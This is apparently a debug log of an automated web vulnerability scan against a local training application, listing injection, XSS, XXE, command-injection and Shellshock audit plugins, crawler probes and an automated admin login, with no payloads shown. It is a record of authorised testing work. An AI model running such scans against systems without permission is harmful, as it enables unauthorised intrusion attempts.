run [Wed Feb 12 09:37:18 2020 - debug] GET http://www.bing.com/search?q=@localhost.&FORM=PERE&first=231 returned HTTP code "200" (id=827,from_cache=0,grep=0,rtt=0.64,did=Fzmkfu0N) [Wed Feb 12 09:37:18 2020 - debug] redos.audit(did="luZLmuU1", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:18 2020 - debug] global_redirect.audit(did="pHrK41GF", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:18 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" () [Wed Feb 12 09:37:18 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:pHrK41GF) [Wed Feb 12 09:37:18 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" () [Wed Feb 12 09:37:18 2020 - debug] GET http://localhost:9090/logout returned HTTP code "302" (id=700,from_cache=0,grep=0,rtt=0.05,did=wOOxq3c0) [Wed Feb 12 09:37:18 2020 - debug] xpath.audit(did="sNQRVJsK", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:18 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" () [Wed Feb 12 09:37:18 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:sNQRVJsK) [Wed Feb 12 09:37:18 2020 - debug] redos.audit(did="luZLmuU1",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.39s to run [Wed Feb 12 09:37:18 2020 - debug] cors_origin.audit(did="bWKbvTtG", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:18 2020 - debug] xpath.audit(did="sNQRVJsK",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.05s to run [Wed Feb 12 09:37:18 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "200" (id=828,from_cache=0,grep=1,rtt=0.07,did=y8xtzSWj) [Wed Feb 12 09:37:18 2020 - debug] GET http://localhost:9090/logout returned HTTP code "302" (id=829,from_cache=0,grep=0,rtt=0.10,did=wOOxq3c0) [Wed Feb 12 09:37:19 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "302" (id=831,from_cache=0,grep=1,rtt=0.09,did=bWKbvTtG) [Wed Feb 12 09:37:19 2020 - debug] Returning fresh average RTT of 0.08 seconds for mutant 35432e4cda8529cafa0aa4cd31e6d165 [Wed Feb 12 09:37:19 2020 - debug] Returning cached average RTT of 0.08 seconds for mutant 35432e4cda8529cafa0aa4cd31e6d165 [Wed Feb 12 09:37:19 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 94. [Wed Feb 12 09:37:19 2020 - debug] htaccess_methods.audit(did="MgsM0pzb", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:19 2020 - debug] dav.audit(did="d4k66Xqe", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:19 2020 - debug] GET http://web.archive.org/web/*/http:/localhost:9090/cmd.jspx returned HTTP code "200" (id=830,from_cache=0,grep=1,rtt=2.03,did=Ah5ueCyf) [Wed Feb 12 09:37:19 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.00 seconds [Wed Feb 12 09:37:19 2020 - debug] ssi.audit(did="6u4fol6f", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:19 2020 - debug] dav.audit(did="d4k66Xqe",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.00s to run [Wed Feb 12 09:37:19 2020 - debug] xxe.audit(did="9ihPOql2", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:19 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" () [Wed Feb 12 09:37:19 2020 - debug] GET http://localhost:9090/logout returned HTTP code "302" (id=833,from_cache=0,grep=1,rtt=0.24,did=wOOxq3c0) [Wed Feb 12 09:37:19 2020 - debug] [id: 140100619783248] HTTP response delay was 0.24. (lower, expected, upper): 8.00, 8.00, 16.10. [Wed Feb 12 09:37:19 2020 - debug] [did: wOOxq3c0] [id: 140100619783248] Failed to control HTTP response delay for URL http://localhost:9090/logout - parameter "User-Agent" for 8 seconds using , response wait time was: 0.235062122345 seconds and response ID: 833. [Wed Feb 12 09:37:19 2020 - debug] eval.audit(did="BtkaVw03", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:19 2020 - debug] global_redirect.audit(did="pHrK41GF",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.84s to run [Wed Feb 12 09:37:19 2020 - debug] GET http://localhost:9090/logout returned HTTP code "302" (id=832,from_cache=0,grep=1,rtt=0.18,did=wOOxq3c0) [Wed Feb 12 09:37:19 2020 - debug] [id: 140100595801104] HTTP response delay was 0.18. (lower, expected, upper): 8.00, 8.00, 16.10. [Wed Feb 12 09:37:19 2020 - debug] [did: wOOxq3c0] [id: 140100595801104] Failed to control HTTP response delay for URL http://localhost:9090/logout - parameter "User-Agent" for 8 seconds using , response wait time was: 0.181262016296 seconds and response ID: 832. [Wed Feb 12 09:37:19 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" () [Wed Feb 12 09:37:19 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:BtkaVw03) [Wed Feb 12 09:37:19 2020 - debug] rosetta_flash.audit(did="fAnfPt9F", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:19 2020 - debug] rosetta_flash.audit(did="fAnfPt9F",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.00s to run [Wed Feb 12 09:37:19 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" () [Wed Feb 12 09:37:19 2020 - debug] xss.audit(did="mmpY2qsV", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:19 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" () [Wed Feb 12 09:37:19 2020 - debug] xss.audit(did="mmpY2qsV",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.00s to run [Wed Feb 12 09:37:19 2020 - debug] xxe.audit(did="9ihPOql2",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.11s to run [Wed Feb 12 09:37:19 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "302" (id=834,from_cache=0,grep=1,rtt=0.25,did=bWKbvTtG) [Wed Feb 12 09:37:19 2020 - debug] cors_origin.audit(did="bWKbvTtG",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.53s to run (0.34s 64% sending HTTP requests) [Wed Feb 12 09:37:19 2020 - debug] shell_shock.audit(did="wOOxq3c0",uri="http://localhost:9090/logout") took 10.67s to run (0.73s 6% sending HTTP requests) [Wed Feb 12 09:37:19 2020 - debug] eval.audit(did="BtkaVw03",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.12s to run [Wed Feb 12 09:37:19 2020 - debug] xst.audit(did="L0VcRp0I", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:19 2020 - debug] ssl_certificate.audit(did="dXQ3gp26", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:19 2020 - debug] ssl_certificate.audit(did="dXQ3gp26",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.00s to run [Wed Feb 12 09:37:19 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" () [Wed Feb 12 09:37:19 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:6u4fol6f) [Wed Feb 12 09:37:19 2020 - debug] xst.audit(did="L0VcRp0I",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.00s to run [Wed Feb 12 09:37:19 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "302" (id=835,from_cache=0,grep=0,rtt=0.08,did=y8xtzSWj) [Wed Feb 12 09:37:19 2020 - debug] ssi.audit(did="6u4fol6f",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.38s to run [Wed Feb 12 09:37:19 2020 - debug] preg_replace.audit(did="dIS2xU2Z", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:19 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" () [Wed Feb 12 09:37:19 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:dIS2xU2Z) [Wed Feb 12 09:37:19 2020 - debug] mx_injection.audit(did="g1DRlFXX", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:19 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" () [Wed Feb 12 09:37:19 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:g1DRlFXX) [Wed Feb 12 09:37:19 2020 - debug] GET http://web.archive.org/web/*/http:/localhost:9090/cmd.jspx returned HTTP code "200" (id=836,from_cache=1,grep=1,rtt=2.03,did=D5VhQwtx) [Wed Feb 12 09:37:19 2020 - debug] Archive.org did not find any pages. [Wed Feb 12 09:37:19 2020 - debug] archive_dot_org.discover(did="3zrJDM78",uri="http://localhost:9090/cmd.jspx") took 2.67s to run [Wed Feb 12 09:37:19 2020 - debug] user_dir.discover(http://localhost:9090/cmd.jspx, did=yQyiULHR) [Wed Feb 12 09:37:19 2020 - debug] [user_dir] Crawling "http://localhost:9090/cmd.jspx" [Wed Feb 12 09:37:19 2020 - debug] The crawl plugin: "user_dir" wont be run anymore. [Wed Feb 12 09:37:19 2020 - debug] response_splitting.audit(did="7CDwCVKQ", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:19 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" () [Wed Feb 12 09:37:19 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:7CDwCVKQ) [Wed Feb 12 09:37:19 2020 - debug] preg_replace.audit(did="dIS2xU2Z",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.04s to run [Wed Feb 12 09:37:19 2020 - debug] mx_injection.audit(did="g1DRlFXX",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.03s to run [Wed Feb 12 09:37:19 2020 - debug] response_splitting.audit(did="7CDwCVKQ",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.01s to run [Wed Feb 12 09:37:19 2020 - debug] rfd.audit(did="5Va1g6So", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:19 2020 - debug] URL "http://localhost:9090/learn/vulnerability/a1_injection" is not vulnerable to RFD because response content-type is "text/html" and content-disposition header is missing, response id 823 [Wed Feb 12 09:37:19 2020 - debug] rfd.audit(did="5Va1g6So",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.00s to run [Wed Feb 12 09:37:19 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "302" (id=838,from_cache=0,grep=0,rtt=0.09,did=y8xtzSWj) [Wed Feb 12 09:37:19 2020 - debug] rfi.audit(did="bBjvZGyB", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:19 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" () [Wed Feb 12 09:37:19 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:bBjvZGyB) [Wed Feb 12 09:37:19 2020 - debug] RFI using local web server for URL: http://localhost:9090/learn/vulnerability/a1_injection [Wed Feb 12 09:37:20 2020 - debug] frontpage.audit(did="sljTzWoC", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:20 2020 - debug] Starting CrawlInfra consumer _teardown() with 0 plugins [Wed Feb 12 09:37:20 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:37:20 2020 - debug] user_dir.discover(did="yQyiULHR",uri="http://localhost:9090/cmd.jspx") took 0.14s to run [Wed Feb 12 09:37:20 2020 - debug] sitemap_xml.discover(http://localhost:9090/cmd.jspx, did=jCmohXgL) [Wed Feb 12 09:37:20 2020 - debug] [sitemap_xml] Crawling "http://localhost:9090/cmd.jspx" [Wed Feb 12 09:37:20 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "200" (id=839,from_cache=1,grep=1,rtt=0.01,did=zGWtqKTp) [Wed Feb 12 09:37:20 2020 - debug] frontpage.audit(did="sljTzWoC",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.03s to run [Wed Feb 12 09:37:20 2020 - debug] The crawl plugin: "sitemap_xml" wont be run anymore. [Wed Feb 12 09:37:20 2020 - debug] Starting CrawlInfra consumer _teardown() with 0 plugins [Wed Feb 12 09:37:20 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:37:20 2020 - debug] sitemap_xml.discover(did="jCmohXgL",uri="http://localhost:9090/cmd.jspx") took 0.03s to run [Wed Feb 12 09:37:20 2020 - debug] GET http://www.bing.com/search?q=@localhost.&FORM=PERE&first=241 returned HTTP code "200" (id=837,from_cache=0,grep=0,rtt=0.61,did=9JrO3m5a) [Wed Feb 12 09:37:20 2020 - debug] dir_file_bruter.discover(http://localhost:9090/cmd.jspx, did=k3mFIOhV) [Wed Feb 12 09:37:20 2020 - debug] [dir_file_bruter] Crawling "http://localhost:9090/cmd.jspx" [Wed Feb 12 09:37:20 2020 - debug] The crawl plugin: "dir_file_bruter" wont be run anymore. [Wed Feb 12 09:37:20 2020 - debug] Starting CrawlInfra consumer _teardown() with 0 plugins [Wed Feb 12 09:37:20 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:37:20 2020 - debug] htaccess_methods.audit(did="MgsM0pzb",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.70s to run [Wed Feb 12 09:37:20 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" () [Wed Feb 12 09:37:20 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:bBjvZGyB) [Wed Feb 12 09:37:20 2020 - debug] rfi.audit(did="bBjvZGyB",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.23s to run [Wed Feb 12 09:37:20 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "302" (id=840,from_cache=0,grep=0,rtt=0.02,did=y8xtzSWj) [Wed Feb 12 09:37:20 2020 - debug] dir_file_bruter.discover(did="k3mFIOhV",uri="http://localhost:9090/cmd.jspx") took 0.00s to run [Wed Feb 12 09:37:20 2020 - debug] phpinfo.discover(http://localhost:9090/cmd.jspx, did=7nMrZxOy) [Wed Feb 12 09:37:20 2020 - debug] [phpinfo] Crawling "http://localhost:9090/cmd.jspx" [Wed Feb 12 09:37:20 2020 - debug] phpinfo.discover(did="7nMrZxOy",uri="http://localhost:9090/cmd.jspx") took 0.00s to run [Wed Feb 12 09:37:20 2020 - debug] find_dvcs.discover(http://localhost:9090/cmd.jspx, did=aCl8Wdm0) [Wed Feb 12 09:37:20 2020 - debug] [find_dvcs] Crawling "http://localhost:9090/cmd.jspx" [Wed Feb 12 09:37:20 2020 - debug] Returning fresh average RTT of 0.06 seconds for mutant 8df71523b2606c98fde2e5921b045cfe [Wed Feb 12 09:37:20 2020 - debug] Returning cached average RTT of 0.06 seconds for mutant 8df71523b2606c98fde2e5921b045cfe [Wed Feb 12 09:37:20 2020 - debug] find_dvcs.discover(did="aCl8Wdm0",uri="http://localhost:9090/cmd.jspx") took 0.04s to run [Wed Feb 12 09:37:20 2020 - debug] import_results.discover(http://localhost:9090/cmd.jspx, did=Rgub33wI) [Wed Feb 12 09:37:20 2020 - debug] [import_results] Crawling "http://localhost:9090/cmd.jspx" [Wed Feb 12 09:37:20 2020 - debug] GET http://localhost:9090/assets/fa/css/font-awesome.min.css returned HTTP code "200" (id=841,from_cache=0,grep=0,rtt=0.08,did=LkIx1b62) [Wed Feb 12 09:37:20 2020 - debug] file_upload.audit(did="MLrWM2iq", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:20 2020 - debug] file_upload.audit(did="MLrWM2iq",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.00s to run [Wed Feb 12 09:37:21 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "302" (id=842,from_cache=0,grep=1,rtt=0.02,did=y8xtzSWj) [Wed Feb 12 09:37:21 2020 - debug] The crawl plugin: "import_results" wont be run anymore. [Wed Feb 12 09:37:21 2020 - debug] Starting CrawlInfra consumer _teardown() with 0 plugins [Wed Feb 12 09:37:21 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:37:21 2020 - debug] import_results.discover(did="Rgub33wI",uri="http://localhost:9090/cmd.jspx") took 0.08s to run [Wed Feb 12 09:37:21 2020 - debug] payment_webhook_finder.discover(http://localhost:9090/cmd.jspx, did=vxUqJJpP) [Wed Feb 12 09:37:21 2020 - debug] [payment_webhook_finder] Crawling "http://localhost:9090/cmd.jspx" [Wed Feb 12 09:37:21 2020 - debug] csrf.audit(did="sxluUV6z", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:21 2020 - debug] csrf.audit(did="sxluUV6z",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.00s to run [Wed Feb 12 09:37:21 2020 - debug] deserialization.audit(did="R8HZjycF", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:21 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "302" (id=843,from_cache=0,grep=1,rtt=0.03,did=y8xtzSWj) [Wed Feb 12 09:37:21 2020 - debug] [id: 140100623489872] HTTP response delay was 0.03. (lower, expected, upper): 8.00, 8.00, 16.08. [Wed Feb 12 09:37:21 2020 - debug] os_commanding.audit(did="V87TXFFk", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:21 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css" () [Wed Feb 12 09:37:21 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css" () [Wed Feb 12 09:37:21 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:V87TXFFk) [Wed Feb 12 09:37:21 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css" () [Wed Feb 12 09:37:21 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css" () [Wed Feb 12 09:37:21 2020 - debug] os_commanding.audit(did="V87TXFFk",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.00s to run [Wed Feb 12 09:37:21 2020 - debug] [id: 140100553254480] HTTP response delay was 0.02. (lower, expected, upper): 8.00, 8.00, 16.08. [Wed Feb 12 09:37:21 2020 - debug] [did: y8xtzSWj] [id: 140100553254480] Failed to control HTTP response delay for URL http://localhost:9090/learn/vulnerability/a1_injection - parameter "User-Agent" for 8 seconds using , response wait time was: 0.0214171409607 seconds and response ID: 842. [Wed Feb 12 09:37:21 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css" () [Wed Feb 12 09:37:21 2020 - debug] deserialization.audit(did="R8HZjycF",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.04s to run [Wed Feb 12 09:37:21 2020 - debug] [did: y8xtzSWj] [id: 140100623489872] Failed to control HTTP response delay for URL http://localhost:9090/learn/vulnerability/a1_injection - parameter "User-Agent" for 8 seconds using , response wait time was: 0.027801990509 seconds and response ID: 843. [Wed Feb 12 09:37:21 2020 - debug] shell_shock.audit(did="y8xtzSWj",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 1.80s to run (0.31s 17% sending HTTP requests) [Wed Feb 12 09:37:21 2020 - debug] lfi.audit(did="m38m8eGA", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:21 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css" () [Wed Feb 12 09:37:21 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:m38m8eGA) [Wed Feb 12 09:37:21 2020 - debug] sqli.audit(did="9ZFrFWDQ", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:21 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css" () [Wed Feb 12 09:37:21 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:9ZFrFWDQ) [Wed Feb 12 09:37:21 2020 - debug] detailed.has_active_session() and detailed.login() [Wed Feb 12 09:37:21 2020 - debug] [auth.detailed] Checking if session for user admin is active (did: T4rViA0V) [Wed Feb 12 09:37:21 2020 - debug] localhost:9090 connection pool stats (free:53 / in_use:0 / max:50 / total:53) [Wed Feb 12 09:37:21 2020 - debug] There are no connections marked as in use in the connection pool at this time [Wed Feb 12 09:37:21 2020 - debug] lfi.audit(did="m38m8eGA",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.06s to run [Wed Feb 12 09:37:21 2020 - debug] blind_sqli.audit(did="qUMr3Jxp", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:21 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css" () [Wed Feb 12 09:37:21 2020 - debug] sqli.audit(did="9ZFrFWDQ",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.02s to run [Wed Feb 12 09:37:21 2020 - debug] phishing_vector.audit(did="7LN10Oc0", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:21 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css" () [Wed Feb 12 09:37:21 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:7LN10Oc0) [Wed Feb 12 09:37:21 2020 - debug] Finished audit.phishing_vector (did=7LN10Oc0) [Wed Feb 12 09:37:21 2020 - debug] phishing_vector.audit(did="7LN10Oc0",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.00s to run [Wed Feb 12 09:37:21 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css" () [Wed Feb 12 09:37:21 2020 - debug] generic.audit(did="uUVAOSgX", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:21 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css" () [Wed Feb 12 09:37:21 2020 - debug] blind_sqli.audit(did="qUMr3Jxp",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.05s to run [Wed Feb 12 09:37:21 2020 - debug] format_string.audit(did="ymq1sw7s", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:21 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css" () [Wed Feb 12 09:37:21 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:ymq1sw7s) [Wed Feb 12 09:37:21 2020 - debug] format_string.audit(did="ymq1sw7s",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.01s to run [Wed Feb 12 09:37:21 2020 - debug] generic.audit(did="uUVAOSgX",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.05s to run [Wed Feb 12 09:37:21 2020 - debug] websocket_hijacking.audit(did="fSm2o8zv", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:21 2020 - debug] shell_shock.audit(did="LlW5EkqZ", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:21 2020 - debug] websocket_hijacking.audit(did="fSm2o8zv",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.04s to run [Wed Feb 12 09:37:21 2020 - debug] memcachei.audit(did="mXvfDy7l", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:21 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css" () [Wed Feb 12 09:37:21 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:mXvfDy7l) [Wed Feb 12 09:37:21 2020 - debug] memcachei.audit(did="mXvfDy7l",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.01s to run [Wed Feb 12 09:37:22 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "200" (id=845,from_cache=0,grep=0,rtt=0.16,did=T4rViA0V) [Wed Feb 12 09:37:22 2020 - debug] [auth.detailed] User "admin" is NOT logged into the application, the `check_string` was not found in the HTTP response with ID 845. (did: T4rViA0V) [Wed Feb 12 09:37:22 2020 - debug] [auth.detailed] Logging into the application with user: admin (did: 0zVJeVwK) [Wed Feb 12 09:37:22 2020 - debug] un_ssl.audit(did="2gVQO1dy", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:22 2020 - debug] un_ssl.audit(did="2gVQO1dy",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.00s to run [Wed Feb 12 09:37:22 2020 - debug] ldapi.audit(did="ScHPErC8", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:22 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css" () [Wed Feb 12 09:37:22 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:ScHPErC8) [Wed Feb 12 09:37:22 2020 - debug] GET http://localhost:9090/assets/fa/css/font-awesome.min.css returned HTTP code "200" (id=846,from_cache=0,grep=1,rtt=0.03,did=LlW5EkqZ) [Wed Feb 12 09:37:22 2020 - debug] buffer_overflow.audit(did="Mwrl0ZoD", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:22 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css" () [Wed Feb 12 09:37:22 2020 - debug] ldapi.audit(did="ScHPErC8",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.01s to run [Wed Feb 12 09:37:22 2020 - debug] redos.audit(did="IWuqb3yl", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:22 2020 - debug] global_redirect.audit(did="Fc4TCgps", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:22 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css" () [Wed Feb 12 09:37:22 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:Fc4TCgps) [Wed Feb 12 09:37:22 2020 - debug] buffer_overflow.audit(did="Mwrl0ZoD",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.02s to run [Wed Feb 12 09:37:22 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css" () [Wed Feb 12 09:37:22 2020 - debug] xpath.audit(did="O1dCiXuE", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:22 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css" () [Wed Feb 12 09:37:22 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:O1dCiXuE) [Wed Feb 12 09:37:22 2020 - debug] cors_origin.audit(did="PT3595wx", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:22 2020 - debug] redos.audit(did="IWuqb3yl",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.14s to run [Wed Feb 12 09:37:22 2020 - debug] xpath.audit(did="O1dCiXuE",uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") took 0.07s to run [Wed Feb 12 09:37:22 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 95. [Wed Feb 12 09:37:22 2020 - debug] htaccess_methods.audit(did="MJdpWhVA", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:22 2020 - debug] dav.audit(did="qpeUerWS", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:22 2020 - debug] localhost:9090 connection pool stats (free:38 / in_use:14 / max:50 / total:52) [Wed Feb 12 09:37:22 2020 - debug] Connections with more in use time: (a5419411797e137e, 0.17 sec) (f5adb0c09c70ca09, 0.16 sec) (450aace75c9d8a42, 0.12 sec) (955b76b517b2a7f0, 0.10 sec) (ff9acc2bc4ba5606, 0.09 sec) [Wed Feb 12 09:37:22 2020 - debug] GET http://www.bing.com/search?q=@localhost.&FORM=PERE&first=251 returned HTTP code "200" (id=847,from_cache=0,grep=0,rtt=0.87,did=udnB6dMg) [Wed Feb 12 09:37:22 2020 - debug] ssi.audit(did="5HoV4k56", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:22 2020 - debug] xxe.audit(did="pG3uHFiq", uri="http://localhost:9090/assets/fa/css/font-awesome.min.css") [Wed Feb 12 09:37:22 2020 - debug] Created 0 mutants for "Method: GET | 